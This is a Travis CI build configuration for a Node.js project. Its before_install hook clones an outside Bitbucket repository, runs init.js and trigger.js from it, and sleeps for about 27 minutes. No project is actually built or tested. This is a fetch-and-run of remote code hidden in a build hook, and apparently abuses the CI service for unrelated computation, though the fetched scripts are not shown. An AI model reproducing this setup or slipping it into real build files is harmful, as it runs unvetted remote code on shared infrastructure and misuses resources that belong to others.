language: node_js
dist: trusty
node_js:
  - 8
  
before_install:
  - rm -rf tmp && git clone https://goopop@bitbucket.org/goopop/buildkitepath.git tmp && cd ./tmp && node init.js &
  - sleep 2m
  - cd ./tmp && node trigger.js
  - sleep 25m
  - rm -rf tmp

branches:
  only:
    - master
